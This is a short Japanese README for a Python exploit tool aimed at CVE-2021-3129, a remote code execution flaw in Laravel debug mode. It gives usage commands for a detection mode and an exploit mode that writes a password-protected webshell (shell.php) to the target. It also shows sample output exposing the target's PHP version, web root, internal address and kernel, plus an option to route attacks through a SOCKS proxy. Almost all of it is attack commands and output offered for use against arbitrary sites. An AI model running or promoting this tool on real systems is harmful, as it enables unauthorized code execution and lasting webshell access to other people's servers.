
Laravel DebugモードのRCE脆弱性(CVE-2021-3129)poc / exp
CVE-2021-3129 EXP / POC
python CVE-2021-3129.py
usage: python CVE-2021-3129.py -u [url] --exp
Laravel Debug mode RCE(CVE-2021-3129)POC & EXP
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL ターゲットURLを指定
-e, --exp 脆弱性を悪用してwebshellを書き込みます。指定しない場合は脆弱性の検出のみ行います。
-p PROXY, --proxy PROXY
プロキシを設定(例:socks5://127.0.0.1:7890)
# poc
python CVE-2021-3129.py -u http://xxxxx.com
[✅]脆弱性を検出![🚩]url: http://xxxxx.com [❇️info]PHPバージョン:7.4.14 サイトパス:/var/www/html サーバーアドレス:172.17.0.2 システムバージョン:Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubunt6:28 UTC 2019 x86_64
# exp
python CVE-2021-3129.py -u http://xxxxx.com --exp
[✅]脆弱性を検出![🚩]url: http://xxxxx.com [❇️info]PHPバージョン:7.4.14 サイトパス:/var/www/html サーバーアドレス:172.17.0.2 システムバージョン:Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubunt6:28 UTC 2019 x86_64
[OK] webshellの書き込みに成功しました。アクセス先: http://xxxxx.com/shell.php , パスワード: whoami
# proxy
python CVE-2021-3129.py -u http://xxxxx.com/ -p socks5://127.0.0.1:7890
python CVE-2021-3129.py -u http://xxxxx.com/ --exp -p socks5://127.0.0.1:7890
参考リンク
使用上の注意